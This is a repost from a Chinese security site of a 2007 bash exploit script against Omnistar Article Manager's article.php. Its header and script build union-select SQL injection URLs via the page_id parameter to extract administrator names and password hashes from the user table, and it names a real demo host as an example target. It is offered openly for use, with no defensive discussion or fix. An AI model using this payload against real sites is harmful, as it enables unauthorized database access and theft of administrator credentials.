|
Omnistar Article Manager Software (article.php) SQL Injection Exploit
|
|
来源:http://Hackteach.org 作者:Cold z3ro 发布时间:2007-09-18
|
|
#/bin/bash
####################################################################################################################
# #
# Omnistar Article Manager Software (article.php) Remote SQL Injection Exploit #
# #
# Exploit Coded By : Cold z3ro #
# #
# http://Hackteach.org #
# #
# #
# Exploit : /article.php?op=favorite&article_id=4&page_id=-1'/**/union/**/select/**/name,1/**/from/**/user/* #
# /article.php?op=favorite&article_id=4&page_id=-1'/**/union/**/select/**/password,1/**/from/**/user/* #
# #
# Example : http://demo.hostcontroladmin.com/demo_press2/articles/ #
# #
####################################################################################################################
URL=$1;
PATH="$2/";
echo -e "\n";
echo -e "\n";
echo -e "######################################################################################"
echo -e "# Omnistar Article Manager Software (article.php) Remote SQL Injection Exploit #"
echo -e "# Exploit Coded By By : Cold z3ro #"
echo -e "# http://Hackteach.org #"
echo -e "######################################################################################"
if [ "$URL" = "" ]; then
echo -e "\n USAGE: $0 [URL] [NukePath]"
echo -e " Example: $0 www.victim.net NukePath\n"
exit
fi;
if [ $PATH = "/" ]; then PATH=""; fi;
name_query_url="http://$URL/$PATH""article.php?op=favorite&article_id=4&page_id=-1'/**/union/**/select/**/name,1/**/from/**/user/*";
password_query_url="http://$URL/$PATH""article.php?op=favorite&article_id=4&page_id=-1'/**/union/**/select/**/password,1/**/from/**/user/*";
echo -e "\n";
echo -e "\n";
echo -e "Direct Query URL For Admin name: \n";
echo -e ""$name_query_url"\n";
echo -e "\n";
echo -e "Direct Query URL For Admin Hash:\n";
echo -e ""$password_query_url"\n";
|
| |
|
[ 推荐]
[ 评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
| |
|
|
 |
|
推荐广告 |
|
|
|
|
|
